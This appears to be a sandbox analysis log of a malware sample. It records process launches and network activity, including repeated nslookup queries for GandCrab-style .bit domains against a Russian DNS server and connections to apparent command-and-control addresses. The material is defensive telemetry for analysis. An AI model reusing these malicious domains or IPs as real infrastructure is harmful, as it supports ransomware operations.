nslookup emsisoft.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x120,0x124,0x40,0x128,0x7ffcedc746f8,0x7ffcedc74708,0x7ffcedc74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:8

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1

C:\Windows\SysWOW64\nslookup.exe

nslookup emsisoft.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3664 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17842015370013662339,7991482659233776040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcedc746f8,0x7ffcedc74708,0x7ffcedc74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:8

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5448 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,15242808007048899315,7555747760476258363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Windows\SysWOW64\nslookup.exe

nslookup emsisoft.bit dns1.soprodns.ru

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcedc746f8,0x7ffcedc74708,0x7ffcedc74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3112 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,1175043275261708047,8963621450448643431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3112 /prefetch:8

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup emsisoft.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 35.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 42.56.20.217.in-addr.arpa udp
US 65.49.8.96:443 tcp
BA 77.238.193.186:4444 tcp
US 128.31.0.39:9131 128.31.0.39 tcp
RU 45.151.62.188:443 tcp
US 8.8.8.8:53 39.0.31.128.in-addr.arpa udp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 188.62.151.45.in-addr.arpa udp
US 8.8.8.8:53 41.219.218.216.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 ipv4bot.whatismyipaddress.com udp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 comaddutilspec.work udp
US 8.8.8.8:53 comaddutilspec.xyz udp
US 8.8.8.8:53 comaddutilspec.com udp
US 216.218.219.41:80 216.218.219.41 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 imzombie13.tk udp
DE 193.23.244.244:80 193.23.244.244 tcp
US 8.8.8.8:53 244.244.23.193.in-addr.arpa udp
N/A 127.0.0.1:8668 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 65.49.8.96:443 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 65.49.8.96:443 tcp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
DE 5.189.155.39:9001 tcp
US 8.8.8.8:53 39.155.189.5.in-addr.arpa udp
US 216.218.219.41:80 216.218.219.41 tcp
N/A 127.0.0.1:8668 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 65.49.8.96:443 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
N/A 127.0.0.1:8668 tcp
US 65.49.8.96:443 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
LU 107.189.1.198:443 tcp
N/A 127.0.0.1:8668 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 198.1.189.107.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
GB 88.221.135.24:443 www.bing.com tcp
GB 88.221.135.24:443 www.bing.com tcp
US 8.8.8.8:53 24.135.221.88.in-addr.arpa udp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
